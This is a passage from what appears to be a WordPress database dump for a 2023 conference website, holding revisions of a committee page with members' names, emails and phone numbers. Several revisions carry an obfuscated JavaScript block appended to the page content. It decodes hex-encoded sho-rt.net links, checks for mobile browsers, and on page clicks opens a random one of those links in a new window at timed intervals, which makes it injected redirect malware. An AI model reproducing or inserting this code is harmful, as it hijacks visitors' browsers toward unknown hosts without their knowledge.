_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 09:51:00','2023-06-27 09:51:00','',4849,'https://gsw2023.com/?p=4888',0,'revision','',0),
(4889,4,'2023-06-27 09:54:50','2023-06-27 09:54:50','','amira_ibrahim_zaki','','inherit','open','closed','','amira_ibrahim_zaki','','','2023-06-27 09:54:50','2023-06-27 09:54:50','',4849,'https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg',0,'attachment','image/jpeg',0),
(4891,4,'2023-06-27 09:59:00','2023-06-27 09:59:00','','radwa_ahmed_osman','','inherit','open','closed','','radwa_ahmed_osman','','','2023-06-27 09:59:00','2023-06-27 09:59:00','',4849,'https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg',0,'attachment','image/jpeg',0),
(4892,4,'2023-06-27 10:00:49','2023-06-27 10:00:49','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\" css=\".vc_custom_1687859529575{margin-right: 10px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 12pt;\">nashwa.elbendary@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687859538742{margin-right: 10px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687859975681{margin-right: 10px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 10:00:49','2023-06-27 10:00:49','',4849,'https://gsw2023.com/?p=4892',0,'revision','',0),
(4893,4,'2023-06-27 10:03:01','2023-06-27 10:03:01','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\" css=\".vc_custom_1687859529575{margin-right: 10px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 12pt;\">nashwa.elbendary@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687859538742{margin-right: 10px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687859975681{margin-right: 10px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return 